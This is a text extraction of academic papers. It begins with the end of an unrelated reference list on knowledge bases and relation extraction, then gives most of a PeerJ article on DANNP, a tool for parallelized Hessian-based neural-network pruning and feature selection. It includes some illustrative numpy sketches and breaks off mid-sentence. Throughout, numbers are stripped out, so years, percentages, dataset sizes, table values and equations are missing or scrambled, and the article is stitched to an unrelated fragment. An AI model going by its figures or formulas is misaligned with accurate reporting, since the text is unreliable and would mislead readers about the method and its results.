hierarchy. com- putational linguistics, ( ): – . 
bhavana dalvi, einat minkov, partha p. talukdar, and william w. cohen. . automatic gloss finding for a knowledge base using ontological constraints. in proceedings of wsdm, pages – . claudio delli bovi, luis espinosa anke, and roberto navigli. . knowledge base unification via sense embeddings and disambiguation. in proceedings of emnlp, pages – . xin dong, evgeniy gabrilovich, geremy heitz, wilko horn, ni lao, kevin murphy, thomas strohmann, shaohua sun, and wei zhang. . knowledge vault: a web-scale approach to probabilistic knowl- edge fusion. in proceedings of kdd, pages – . arnab dutta, christian meilicke, and simone paolo ponzetto. . a probabilistic approach for inte- grating heterogeneous knowledge sources. in pro- ceedings of eswc, pages – . katrin erk. . a simple, similarity-based model for selectional preferences. in proceedings of acl, page – . oren etzioni, michele banko, stephen soderland, and daniel s. weld. . open information extraction from the web. commun. acm, ( ): – . anthony fader, stephen soderland, and oren etzioni. . identifying relations for open information extraction. in proceedings of emnlp, pages – . christiane fellbaum. . wordnet: an electronic lexical database. bradford books. paolo ferragina and ugo scaiella. . fast and accu- rate annotation of short texts with wikipedia pages. ieee software, ( ): – . tiziano flati and roberto navigli. . spred: large- scale harvesting of semantic predicates. in proceed- ings of acl, pages – . tiziano flati, daniele vannella, tommaso pasini, and roberto navigli. . two is bigger (and better) than one: the wikipedia bitaxonomy project. in pro- ceedings of acl, pages – . robert w. floyd. . algorithm : shortest path. communications of the acm, ( ): – . adam grycner and gerhard weikum. . harpy: hypernyms and alignment of relational paraphrases. in proceedings of coling, pages – . rahul gupta, alon halevy, xuezhi wang, steven eui- jong whang, and fei wu. . biperpedia: an ontology for search applications. in proceedings of vldb, pages – . raphael hoffmann, congle zhang, xiao ling, luke zettlemoyer, and daniel s. weld. . knowledge- based weak supervision for information extraction of overlapping relations. in proceedings of naacl hlt, pages – . eduard hovy, roberto navigli, and simone paolo ponzetto. . collaboratively built semi-structured content and artificial intelligence: the story so far. artificial intelligence, : – . sarath kumar kondreddi, peter triantafillou, and ger- hard weikum. . combining information extrac- tion and human computing for crowdsourced knowl- edge acquisition. in proceedings of icde, pages – . sebastian krause, hong li, hans uszkoreit, and feiyu xu. . large-scale learning of relation- extraction rules with distant supervision from the web. in proceedings of iswc. ni lao, amarnag subramanya, fernando pereira, and william w. cohen. . reading the web with learned syntactic-semantic inference rules. in pro- ceedings of emnlp-conll, pages – . jens lehmann, robert isele, max jakob, anja jentzsch, dimitris kontokostas, pablo n. mendes, sebastian hellmann, mohamed morsey, patrick van kleef, sören auer, and christian bizer. . dbpedia - a large-scale, multilingual knowledge base extracted from wikipedia. semantic web journal, pages – . thomas lin, mausam, and oren etzioni. . no noun phrase left behind: detecting and typing un- linkable entities. in proceedings of emnlp-conll, pages – . farzaneh mahdisoltani, joanna biega, and fabian m. suchanek. . yago : a knowledge base from multilingual wikipedias. in cidr. pablo n. 
mendes, max jakob, andrés garcía-silva, and christian bizer. . dbpedia spotlight: shedding light on the web of documents. in proceedings of i-semantics, pages – . rada mihalcea and andras csomai. . wikify!: linking documents to encyclopedic knowledge. in proceedings of cikm, pages – . david milne and ian h. witten. . an open-source toolkit for mining wikipedia. artificial intelligence, : – . bonan min, shuming shi, ralph grishman, and chin- yew lin. . ensemble semantics for large-scale unsupervised relation extraction. in proceedings of emnlp-conll, pages – . mike mintz, steven bills, rion snow, and dan juraf- sky. . distant supervision for relation extrac- tion without labeled data. in proceedings of acl- ijcnlp, pages – . tom m. mitchell. . reading the web: a break- through goal for ai. ai magazine. andrea moro and roberto navigli. . wisenet: building a wikipedia-based semantic network with ontologized relations. in proceedings of cikm, pages – . andrea moro and roberto navigli. . integrating syntactic and semantic analysis into the open infor- mation extraction paradigm. in proceedings of ijcai, pages – . andrea moro, hong li, sebastian krause, feiyu xu, roberto navigli, and hans uszkoreit. . semantic rule filtering for web-scale relation extraction. in proceedings of iswc, pages – . andrea moro, alessandro raganato, and roberto nav- igli. . entity linking meets word sense disam- biguation: a unified approach. tacl, : – . dana movshovitz-attias and william w. cohen. . kb-lda: jointly learning a knowledge base of hi- erarchy, relations, and facts. in proceedings of acl. ndapandula nakashole, gerhard weikum, and fabian m. suchanek. . patty: a taxonomy of rela- tional patterns with semantic types. in proceedings of emnlp-conll, pages – . vivi nastase and michael strube. . transform- ing wikipedia into a large scale multilingual concept network. artificial intelligence, : – . roberto navigli and simone paolo ponzetto. . ba- belnet: the automatic construction, evaluation and application of a wide-coverage multilingual seman- tic network. artificial intelligence, : – . roberto navigli and paola velardi. . learning word-class lattices for definition and hypernym ex- traction. in proceedings of acl, pages – . maria pershina, bonan min, wei xu, and ralph grish- man. . infusion of labeled data into distant su- pervision for relation extraction. in proceedings of acl, pages – . francesco piccinno and paolo ferragina. . from tagme to wat: a new entity annotator. in proceed- ings of erd, pages – . simone paolo ponzetto and michael strube. . tax- onomy induction based on a collaboratively built knowledge repository. artificial intelligence, ( - ): – . philip resnik. . selectional constraints: an information-theoretic model and its computational realization. cognition, ( - ): – . stephen d. richardson, william b. dolan, and lucy van- derwende. . mindnet: acquiring and structur- ing semantic information from text. in proceedings of acl, pages – . sebastian riedel, limin yao, and andrew mccallum. . modeling relations and their mentions with- out labeled text. in proceedings of ecml-pkdd, pages – . sebastian riedel, limin yao, andrew mccallum, and benjamin m. marlin. . relation extraction with matrix factorization and universal schemas. in pro- ceedings of naacl hlt, pages – . alan ritter, mausam, and oren etzioni. . a la- tent dirichlet allocation method for selectional pref- erences. in proceedings of acl, pages – . mark steedman. . the syntactic process. mit press, cambridge, ma, usa. 
mihai surdeanu, julie tibshirani, ramesh nallapati, and christopher d. manning. . multi-instance multi- label learning for relation extraction. in proceedings of emnlp-conll, pages – . denny vrandečić. . wikidata: a new platform for collaborative data collection. in proceedings of www, pages – . william yang wang, kathryn mazaitis, ni lao, tom m. mitchell, and william w. cohen. . efficient in- ference and learning in a large knowledge base - reasoning with extracted information using a locally groundable first-order probabilistic logic. machine learning, ( ): – . fei wu and daniel s. weld. . autonomously semantifying wikipedia. in proceedings of cikm, pages – . mohamed yahya, steven euijong whang, rahul gupta, and alon halevy. . renoun: fact extraction for nominal attributes. in proceedings of emnlp, pages – . submitted july accepted october published november corresponding author vladimir b. bajic, vladimir.bajic@kaust.edu.sa academic editor sebastian ventura additional information and declarations can be found on page doi . /peerj-cs. copyright alshahrani et al. distributed under creative commons cc-by . open access dannp: an efficient artificial neural network pruning tool mona alshahrani , othman soufan , arturo magana-mora , and vladimir b. bajic computational bioscience research center (cbrc), king abdullah university of science and technology (kaust), thuwal, saudi arabia computational bio big-data open innovation laboratory (cbbd-oil), national institute of advanced industrial science and technology (aist), tokyo, japan abstract background. artificial neural networks (anns) are a robust class of machine learning models and are a frequent choice for solving classification problems. however, deter- mining the structure of the anns is not trivial as a large number of weights (connection links) may lead to overfitting the training data. although several ann pruning algorithms have been proposed for the simplification of anns, these algorithms are not able to efficiently cope with intricate ann structures required for complex classification problems. methods. we developed dannp, a web-based tool, that implements parallelized versions of several ann pruning algorithms. the dannp tool uses a modified version of the fast compressed neural network software implemented in c++ to considerably enhance the running time of the ann pruning algorithms we implemented. in addition to the performance evaluation of the pruned anns, we systematically compared the set of features that remained in the pruned ann with those obtained by different state- of-the-art feature selection (fs) methods. results. although the ann pruning algorithms are not entirely parallelizable, dannp was able to speed up the ann pruning up to eight times on a -core machine, compared to the serial implementations. to assess the impact of the ann pruning by dannp tool, we used datasets from different domains. in eight out of the datasets, dannp significantly reduced the number of weights by %– %, while maintaining a competitive or better model performance compared to the unpruned ann. finally, we used a naïve bayes classifier derived with the features selected as a byproduct of the ann pruning and demonstrated that its accuracy is comparable to those obtained by the classifiers trained with the features selected by several state-of-the-art fs methods. the fs ranking methodology proposed in this study allows the users to identify the most discriminant features of the problem at hand. 
to the best of our knowledge, dannp (publicly available at www.cbrc.kaust.edu.sa/dannp) is the only available and on-line accessible tool that provides multiple parallelized ann pruning options. datasets and dannp code can be obtained at www.cbrc.kaust.edu.sa/dannp/data.php and https://doi.org/ . /zenodo. . subjects algorithms and analysis of algorithms, artificial intelligence, data mining and machine learning keywords artificial neural networks, pruning, parallelization, feature selection, classification problems, machine learning, artificial inteligence how to cite this article alshahrani et al. ( ), dannp: an efficient artificial neural network pruning tool. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:vladimir.bajic@kaust.edu.sa https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / www.cbrc.kaust.edu.sa/dannp www.cbrc.kaust.edu.sa/dannp/data.php https://doi.org/ . /zenodo. http://dx.doi.org/ . /peerj-cs. introduction artificial neural networks (anns) can arbitrarily well approximate non-linear target functions (bishop, ). an extensive empirical study (fernandez-delgado, cernadas & barro, ) demonstrated that a voting ensemble of anns achieved the best average performance over the uci machine learning repository on two-class classification problems. the anns have been extensively used for solving different classification problems, see, for example, (almeida, ; ashoor et al., ; bajic et al., ; bajic et al., ; bajic & werner, ; basheer & hajmeer, ; dias, antunes & mota, ; gan, chen & huang, ; gardnera & dorlinga, ; hatzigeorgiou, ; hernández- serna & jiménez-segura, ; jayne, iliadis & mladenov, ; kalkatawi et al., ; li et al., ; magana-mora et al., ; magana-mora & bajic, ; magana-mora, kalkatawi & bajic, ; meireles, almeida & simoes, ; wang et al., ). the anns are universal approximators, given a sufficiently rich model architecture and weights (hornik, stinchcombe & white, ), and may consist of multiple hidden layers. however, the multilayer ann representation rapidly increases model complexity due to the large number of tunable weights. moreover, the high number of weights may amplify irrelevant characteristics or noise that may be present in the training data and lead to a poor model generalization for unseen data. this problem is referred to as overfitting of the training data, and different methods have been proposed to address this undesirable effect. these methods may be broadly divided into three groups: ( ) ann regularization (ng, ; nowlan & hinton, ), ( ) early stopping (prechelt, ), and ( ) ann pruning (burden & winkler, ; reed, ; srivastava et al., ; wan et al., ). here, we focus on the ann pruning as it not only simplifies the model structure but also results in fewer computations and smaller storage requirements for the pruned network. in addition, as a side benefit, the ann pruning may keep the most useful features and rank their relevance based on their predictive capabilities. although there are different robust methods for performing feature selection (fs) and feature ranking, selection of the fs method and the parameters is not trivial. refer to soufan et al. ( b) for more details on fs. ann pruning algorithms may be divided into two categories. the simplest, magnitude- based pruning (mp) methods consist of removing weights with the lowest magnitudes. 
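as a minimal sketch (not the dannp implementation; names are illustrative), magnitude-based pruning zeroes out the weights with the smallest absolute values and then retrains the network on the surviving connections:

```python
import numpy as np

def magnitude_prune(weights: np.ndarray, fraction: float) -> np.ndarray:
    """Return a boolean mask that keeps the largest-|w| weights and prunes the rest."""
    flat = np.abs(weights).ravel()
    k = int(fraction * flat.size)              # number of weights to remove
    if k == 0:
        return np.ones_like(weights, dtype=bool)
    threshold = np.partition(flat, k - 1)[k - 1]
    return np.abs(weights) > threshold         # weights at or below the threshold are pruned

w = np.array([[0.01, -1.2, 0.3], [0.7, -0.05, 2.1]])
mask = magnitude_prune(w, fraction=0.5)        # drop half of the weights
w_pruned = w * mask                            # pruned connections stay at zero during retraining
```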
after a certain number of weights are deleted, the ann is retrained. while this approach may work for some problems, removing the weights with the smallest magnitudes does not always produce the smallest increase of the error function (hassibi, stork & wolff, ). the second, more sophisticated category of pruning algorithms measures the sensitivity of the error function to each weight using second-order information. as a result, the weight that least increases the error function is removed (hassibi, stork & wolff, ; karnin, ; mozer & smolensky, ). these approaches usually result in more accurate models as they take advantage of the hessian matrix (referred to as the h matrix, hereafter) to account for the additional curvature information of the error function (hassibi, stork & wolff, ). in this category of pruning algorithms, optimal brain damage (obd) (lecun et al., ) uses the second-order derivative of the error function with respect to the network weights. obd avoids the complexity of computing the h matrix by assuming a diagonal h matrix. nevertheless, this assumption does not hold in many cases, leading to the removal of the wrong weights (hassibi, stork & wolff, ), and therefore affects the accuracy of the resulting models. in contrast to obd, the optimal brain surgeon (obs) algorithm (hassibi, stork & wolff, ) does not assume a diagonal h matrix. additionally, obs provides an approximation of the inverse h matrix (h-inverse) and is shown to produce more robust models than the mp and obd algorithms (hassibi, stork & wolff, ). refer to article s for further details about these methods. however, the pruning of anns is a computationally expensive task that often limits its application to real-life problems where datasets may contain a large number of samples and data features. therefore, speeding up the pruning process is essential for many practical applications. although pruning algorithms of the obs type are not entirely parallelizable, certain computationally intensive parts are, which leads to a significant speedup on multicore processors. for the reasons mentioned above, this study aims to develop a user-friendly tool with several parallelized ann pruning algorithms able to cope with complex or medium-size data. for this, we developed the dannp tool, which implements several parallelized variants of ann pruning algorithms. we demonstrated the efficiency and utility of the implemented algorithms in the dannp tool on several small to medium-size benchmark datasets. moreover, as a useful by-product, the pruning process selects the most useful data features for the problem at hand. fs methods that find a subset of features for training a classification model are often used to derive simpler and faster models. although in many cases the reduced number of features may result in improved performance, the feature subset is not always capable of describing the data accurately and may frequently result in models with inferior performance. in this study, we demonstrate that the selected features result in similar or improved classification performance in comparison with several state-of-the-art fs methods on the considered datasets. materials and methods in this section, we first define the hessian-based pruning algorithm and the implemented modifications for the parallelization of the code, followed by the details on the fs methods.
finally, we describe the datasets and model evaluation procedure to assess the performance of the dannp tool. hessian-based pruning formulation and dannp parallelization the obs uses the second-order information of the error function and measures the saliency of the ann weights. the algorithm evaluates the saliency by the effect on the error function when the ann weight vector w is perturbed. therefore, the algorithm aims to determine the weights that cause the least increase of the error function e. the error function may be approximated by a taylor series as follows (hassibi, stork & wolff, ): e(w) ∼=e(w+ w)=e(w)+e′(w) w+ e ′′ (w) w +··· e =e(w+ w )−e(w)=e′(w) w+ e ′′ (w) w +··· e = e′(w) w+ wt h w+··· ( ) alshahrani et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. where e′(w) is the first-order derivative of e with respect to w (the gradients vector); h is the h matrix determined as h =∂ e/∂w , i.e., as the second-order derivative of e with respect to w. the approximation of the h-inverse is obtained via an iterative procedure as follows (hassibi, stork & wolff, ): (hm+ )− =(hm)− − (hm)− ·gm+ w ·g [m+ ]t w ·(h m)− p+g[m+ ] t w ·(h m)− ·g[m+ ] w ( ) where ( h )− =α− i, i is the identity matrix and α is a small scalar; gm+ w is the gradient vector from the backpropagation calculations in iteration m+ , where m denotes the number of iterations; p is a scalar that represents the number of training samples. the h matrix is of size v , where v is the total number of weights in the network. the code optimization and parallelization of the pruning methods implemented in the dannp tool are achieved by ( ) implementation of a faster version of the algorithm for the approximation of the h-inverse, and ( ) reducing the number of evaluations of the h-inverse approximation. to address the faster algorithm for approximation of the h-inverse, we modified the implementation of the calculation of the h-inverse using, where applicable, optimized blas routines (blackford et al., ) and modified the code to reduce the overhead by computing repeated terms only once. however, since the approximation of the h-inverse is based on an iterative process (eq. ( )), this inherent limitation hinders full parallel scaling. algorithm describes the implementation of the parallel version of eq. ( ) based on the blas routines. to address the reduction of the number of evaluations of the h-inverse approximation, we implemented multiple-weights obs (mwobs-parallel), which removes multiple weights in each pruning iteration while using the optimization described in algorithm . in contrast to obs where the h-inverse has to be computed for removing a single weight, in mwobs-parallel this computation is performed only once for removing n weights, where the number of n weights is set to % of the weights in the initial ann. this approach significantly reduces the running time and frequently achieves comparable or better performance relative to the serial obs or the fully connected anns. ann model the ann models were derived by using a modified version of the fast compressed neural network software (klima, ). this software is a modular and fast c++ implementation of ann algorithms. we modified the software to use optimized blas to replace the serial approximation of the h-inverse update routines (using eq. ( )). 
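written out, the iterative update above applies one rank-one correction per gradient vector, h_inv(m+1) = h_inv(m) - (h_inv(m) g)(h_inv(m) g)^t / (p + g^t h_inv(m) g), starting from h_inv(0) = alpha^-1 i. the numpy sketch below illustrates the formula only; it collapses the per-output-unit loop into a single gradient vector per training sample and is not the dannp c++/blas code.

```python
import numpy as np

def hessian_inverse_approx(gradients: np.ndarray, alpha: float = 1e-4) -> np.ndarray:
    """Iteratively approximate the inverse Hessian from per-sample gradient vectors.

    gradients: shape (P, V), one backpropagated gradient vector per training
    sample, where V is the total number of weights in the network.
    """
    P, V = gradients.shape
    H_inv = np.eye(V) / alpha                  # initial estimate alpha^-1 * I
    for g in gradients:
        Hg = H_inv @ g                         # repeated term, computed once and reused
        denom = P + g @ Hg                     # scalar denominator
        H_inv -= np.outer(Hg, Hg) / denom      # rank-one correction
    return H_inv

rng = np.random.default_rng(0)
H_inv = hessian_inverse_approx(rng.normal(size=(8, 5)))   # toy: 8 samples, 5 weights
```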
in this study, we considered ann with a single layer as it has been demonstrated that one hidden layer, with a sufficient number of nodes and a sigmoid activation function, is enough to learn complex data patterns (cybenko, ; hornik, stinchcombe & white, ). however, our solutions apply to multilayer ann architecture. moreover, the resilient backpropagation algorithm (riedmiller, ) was used to train the ann as it frequently achieves faster convergence over the conventional backpropagation algorithm. finally, we considered a different number of nodes in the hidden layer for comparing the pruning effects of different algorithms. the total number of weights correlates with the alshahrani et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. algorithm hessian inverse approximation : compute h− by approximation : initiate h− =α − i : for each training sample m : for each output unit k : update h− by using eq. ( ) : compute hgwx =h − ∗g : compute the denominator scalar d =p+gt ∗hgwx : compute the numerator and update using optimized blas routines h− m+ =h − m −(hgwx ⊗(hgwx ) t/d) : end for : end for note: operators∗ and⊗ refer to the matrix vector product and the outer product of two vectors, respectively. ann complexity and is calculated as follows: numweights=numinputs×numhnodes+numhnodes×numclasses ( ) where numinputs, numhnodes, and numclasses refer to the number of input features, the number of nodes in the hidden layer, and the number of classes in the classification problem, respectively. ann pruning solutions implemented in dannp tool the dannp tool implements the parallel versions of three obs-based approaches to ann pruning using the approximation of the h-inverse. these generate simpler structures and improve the model generalization with the least sacrifice in accuracy, compared to mp and obd. the implemented algorithms are obs-parallel, mwobs-parallel, and unit-based obs (uobs-parallel), which are described in the following subsections. however, we also provide the simple mp algorithm for the sake of comparison. we did not compare against obd algorithm as it has been shown that assuming a diagonal h matrix leads to the removal of wrong weights and produces inferior models (hassibi, stork & wolff, ). in our implementation, pruning algorithms continue to remove weights as long as the increase in the training mean-squared error (mse) is below % or stops when it reaches the pre-specified number of iterations. obs-parallel the obs algorithm aims to find the weight that when eliminated, it causes overall the least increase in the error function ei calculated according to ei= w i[ h− ] i ( ) where wi refers to the i-th weight that is to be removed. in this algorithm, the calculation of the h-inverse is required to remove a single weight per pruning iteration (fig. a). finally, the remaining weights in the network are updated to account for the removed weight (see article s for further details). alshahrani et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. figure pruning variants of obs. (a) obs algorithm: a single weight (dashed line) is removed per pruning iteration. (b) mwobs algorithm: multiple weights (dashed lines) are removed per pruning itera- tion. (c) uobs algorithm: a node and its incoming/outgoing weights are removed in a pruning iteration. full-size doi: . /peerjcs. 
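in the saliency expression above, e_i = w_i^2 / (2 [h_inv]_ii), and the standard obs correction of the remaining weights is -(w_q / [h_inv]_qq) times the q-th column of h_inv (hassibi, stork & wolff). the sketch below renders one such pruning step on a flattened weight vector; it is a didactic illustration of these formulas, not the dannp code.

```python
import numpy as np

def obs_prune_one(w: np.ndarray, H_inv: np.ndarray):
    """One OBS step: remove the least-salient weight and adjust the remaining ones.

    w: flattened weight vector (length V); H_inv: approximated inverse Hessian (V x V).
    Returns the updated weights, the pruned index and its saliency.
    """
    saliency = w ** 2 / (2.0 * np.diag(H_inv))      # expected error increase per weight
    q = int(np.argmin(saliency))                    # weight whose removal hurts least
    w_new = w - (w[q] / H_inv[q, q]) * H_inv[:, q]  # correct all remaining weights
    w_new[q] = 0.0                                  # the pruned connection is exactly zero
    return w_new, q, float(saliency[q])
```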
/fig- mwobs-parallel in contrast to obs, the mwobs algorithm may remove multiple weights in a single pruning iteration (fig. b). to achieve this, the error increase ei is evaluated individually for every weight in the network by using eq. ( ). weights are then sorted according to the increase of the associated errors and the n weights with the smallest error increase are selected for pruning, where n is set to % of the weighs in the initial ann. this simplification is made to avoid evaluating every combination of weights as described in the general formulation of pruning n weights using obs in stahlberger & riedmiller ( ). uobs-parallel the uobs variant described in stahlberger & riedmiller ( ) defines a heuristic that leads to removal of all outgoing weights of a particular node, thus reducing the overall number of considered nodes in the network (fig. c). we implemented this variant for the purpose of completeness, and integrated the optimized parallel approximation of the h-inverse in this approach, as indicated in algorithm . feature selection through ann pruning and comparison settings due to the simplification of the ann structure through pruning, it is possible that some of the input data features are not used in the pruned ann. this amounts to the fs in the wrapper setting. figure b shows an example of a pruned ann where input feature x is discarded (having no connecting weights from the input to the hidden layer). we ranked, in descending order, the remaining features (x and x , from the example) by considering, for each input feature, the sum of the absolute values of all outgoing weights. similar to the comprehensive analysis of fs methods performed in soufan et al. ( b), we analyzed the pruning effects of the mwobs-parallel variant on the features and compared it with the state-of-the-art methods for fs. we considered seven different fs methods from the feast matlab toolbox (brown et al., ), namely, conditional mutual information maximization (cmim) (fleuret, ), correlation-based fs (hall, ), joint mutual information (jmi) (yang & moody, ), maximum relevance minimum redundancy (mrmr) (peng, long & ding, ), relief (kira & rendell, alshahrani et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table datasets summary. datasets number of features number of samples number of classes breast cancer (bc) heart disease (hd) wisconsin diag. breast cancer (wdbc) promoters prediction (pp) cardiac arrhythmia (ca) synthetic madelon (sm) , prostate cancer (pc) , tf-tf combination (tftf) , aid compounds (aid) , default credit cards (dcc) , epileptic seizure recognition (esr) , lsvt voice rehabilitation (lsvt) urban land cover (ulc) sensorless drive diagnosis (sdd) , human activity recognition (har) , mnist digits (md) , ), t-test (guyon & elisseeff, ), and receiver operating characteristic curve (roc) (guyon & elisseeff, ). refer to article s for more details on the fs methods. we used mwobs-parallel for determining the feature subsets, as it can cope with complex datasets and ann structures requiring short running times. since the selected features are the result of the ann pruning, using an ann to assess the performance of the feature subset may produce biased results. thus, we used a naïve bayes classifier to produce unbiased results with the so selected features. 
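the ranking rule described above reduces to a few lines once the pruned input-to-hidden weight matrix is available; the matrix and names below are a toy illustration, not output of the dannp tool.

```python
import numpy as np

def rank_features(W_in: np.ndarray):
    """Score input features of a pruned ANN by the sum of absolute outgoing weights.

    W_in: pruned input-to-hidden weight matrix, shape (num_inputs, num_hidden),
    with pruned connections set to zero. Features whose rows are all zero are discarded.
    """
    scores = np.abs(W_in).sum(axis=1)
    surviving = np.flatnonzero(scores > 0)
    ranked = surviving[np.argsort(scores[surviving])[::-1]]   # descending by score
    return ranked, scores

W_in = np.array([[0.0, 0.0],     # feature 0: every connection pruned -> dropped
                 [0.8, -0.1],    # feature 1
                 [0.0, 0.4]])    # feature 2
ranked, scores = rank_features(W_in)
print(ranked)   # [1 2]; feature 0 no longer reaches the hidden layer
```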
datasets we measured the performance of the implemented ann pruning algorithms, on datasets from different domains and one synthetic dataset, all with a different number of features and number of samples. the selected datasets reflect some of the data properties present in real applications, i.e., small or medium size datasets represented by both small and large number of features. from these datasets, seven are taken from the uci machine learning repository (lichman, ), and nine are obtained from recent studies (anguita et al., ; johnson & xie, ; schmeier, jankovic & bajic, ; singh et al., ; soufan et al., a; tsanas et al., ; wang et al., ; yeh & lien, ). table shows the summary information for these datasets. data processing and model evaluation feature values for all considered datasets were normalized to have values within the range of [− , ]. we used the k-fold cross-validation technique to estimate the performance of anns. k-fold cross-validation requires dividing the whole dataset into k subsets of similar size. we train the ann model on k− subsets and test it on the remaining subset. the alshahrani et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. table statistical performance measures. tp, tn , fp and fn denote true positive, true negative, false positive and false negative predictions, respectively. for mse, m is the number of samples, y is the ann output value, and ti is the target value for the i-th sample. statistical measure equation accuracy tp+tntp+tn+fp+fn sensitivity tptp+fn specificity tntn+fp gm √ sensitivity×specificity mse m ∑m i= (y−ti) procedure repeats for each of the subsets and performance achieved is given as the average across all subsets. in this study, we used k= . we used several statistical measures to evaluate the k-fold cross-validation performance. these metrics are accuracy, sensitivity, specificity, geometric mean (gm), and mean squared error (mse). table defines the considered statistical performance metrics. in addition to these measures, table s shows the results using cohen’s kappa coefficient, recall, precision and f score. to evaluate the utility of the features obtained from the ann pruning, we compared the accuracy of a naïve bayes classifier generated with these selected features to the accuracy of naïve bayes classifiers generated with features selected by seven other fs methods. results and discussion here, we discuss in more details the speedup results obtained by the optimized parallel obs variants, the accuracy resulting from ann pruning and the effects on input features and weights. finally, we present and discuss the results of the comprehensive comparisons for several state-of-the-art methods for fs, with fs and ranking based on ann pruning. three variants of the obs pruning method using code parallelization are implemented in dannp: ( ) obs-parallel, which eliminates only one weight per iteration; ( ) mwobs- parallel, which is an obs variant that eliminates multiple weights per pruning iteration; and ( ) unit-based obs (uobs-parallel), which eliminates a whole node (unit) and their connecting weights per iteration. for the sake of comparison, we also include the simple mp method. running time speedup the speedup metric was used to quantify the running time reduction that we were able to achieve by parallelizing the calculation of the approximation of the h-inverse. 
the speedup is measured as follows: speedup= serial execution time parallel execution time . ( ) the performance gain obtained by parallelization is dictated by amdahl’s law, which states that the optimization of the code is limited by the execution time of the code that cannot be parallelized (amdahl, ). specifically, for anns pruning, the most computationally demanding portion of the program is the calculation of the h-inverse. alshahrani et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. figure speedup comparisons of obs against obs-parallel and mwobs-parallel. (a–d) speedup comparison for datasets where the obs algorithm was completed within h. the y-axis shows the log of the speedup calculated from eq. ( ). the x-axis shows the number of nodes in the ann. full-size doi: . /peerjcs. /fig- therefore, we optimized the approximation of the h-inverse as described in algorithm . although mwobs-parallel was able to cope with the datasets that are described by a relatively large number of samples and input features (i.e., ca, sm, pc, tftf, aid, esr, lsvt, ulc, har, dcc, sdd, and md), the serial implementation of the obs was not able to produce an output in an acceptable amount of time (< h). therefore, figs. a– d show the speedup improvements of obs-parallel and mwobs-parallel over the non-parallel obs in four datasets (bc, hd, wdcb, and pp). table s shows the running time for the obs-parallel, mwobs-parallel, and uobs-parallel for the remaining datasets in which the obs was unable to complete the execution within h. results in fig. and table s show that obs-parallel consistently reduced the running time compared to the standard obs in the considered datasets. the mwobs-parallel achieved slower running times in the bc dataset with a small number of nodes in the hidden layer. this may be due to the possible time required to rank the weights based on the error increase (see the methods section). however, this overhead is marginal and may be ignored when increasing the number of weights in the ann (by increasing the number of nodes in the hidden layer or for datasets with more input features). the significant enhancements in the running time are noticeable for wdbc and pp datasets containing alshahrani et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. table execution time comparison between the pruning variants and nnsysid matlab toolbox. execution time is measured in minutes. these comparison results should be taken cautiously since the dannp and nnsysid are written in different languages and run under different environments. dataset obs-parallel mwobs-parallel uobs-parallel mp nnsysid no. of weights bc . . . . . hd . . . . . wdbc . . . . . pp . . . . . ca . . . . > h , sm . . . . > h , pc . . > h . > h , tftf . . . . > h , aid . . . . > h , ulc . . . . . , sdd . . . . > h md . . . . > h , har . . . . > h , esr . . . . > h , lsvt . . . . > h , dcc . . . . . samples described by and input features, respectively. for instance, in an ann model with nodes in the hidden layer for pp dataset (containing , weights, from eq. ( )), the obs-parallel algorithm runs ∼ . times faster than the serial obs implementation. 
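for completeness, the speedup defined above and the amdahl bound that limits it can be computed directly; the parallel fraction used in this sketch is an assumed input for illustration, not a value measured for dannp.

```python
def speedup(serial_time: float, parallel_time: float) -> float:
    """Observed speedup: serial execution time divided by parallel execution time."""
    return serial_time / parallel_time

def amdahl_bound(parallel_fraction: float, cores: int) -> float:
    """Upper bound on speedup when only a fraction of the work can be parallelized."""
    return 1.0 / ((1.0 - parallel_fraction) + parallel_fraction / cores)

print(speedup(160.0, 20.0))      # 8.0 for made-up timings (e.g. minutes)
print(amdahl_bound(0.9, 32))     # ~7.8: the serial 10% caps the achievable speedup
```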
the main advantage of mwobs-parallel algorithms is that it requires fewer evaluations of the h-inverse and when coupled with a parallel approximation of the h-inverse, more speedup is achieved. furthermore, we compared the performance of the pruning variants implemented in dannp against the obs implementation in nnsysid matlab toolbox (norgaard, ravn & poulsen, ). the nnsysid is a toolbox for the identification of nonlinear dynamic systems with anns, often used as a benchmark, which implements several algorithms for ann training and pruning. the fair comparison between the dannp and nnsysid tools is not possible since nnsysid runs under matlab r b environment. still, to get an insight about how much time is needed for the same tasks with these two tools, the nnsysid and the pruning variants implemented in dannp were run under the same conditions. these include the same data partitioning, activation functions, hidden units, training algorithms, and tolerance level. data were partitioned into % testing, % validation, and % training. table shows the execution time comparison between dannp and nnsysid toolbox. for datasets with more features and samples, nnsysid fails to scale for datasets with a larger number of features. these results show the running time improvement obtained by our implementation to approximate the h-inverse. so far, we have only analyzed the running time of the implemented ann pruning algorithms. next, we discuss in details the effects of the pruning algorithms in the ann training error, cross-validation performance and on the fs resulting from the pruning. alshahrani et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. effects of different pruning algorithms on the ann training error apart from the running time, the main difference in the ann pruning algorithms is the selection of the weights to be removed during a pruning iteration. to investigate the effects of the different ann pruning algorithms on the network, we evaluated the training performance through pruning steps until all weights are removed. the aim is to derive the simplest ann structure (smaller number of weights) without increasing the mse on the training data. figures a– j and fig. s show the effects of the different pruning algorithms on the mse. from these results, we observed that different pruning algorithms (including mp) were able to retain very few network weights without increasing the mse for some datasets (i.e., pc and pp). however, the mp algorithm produced the 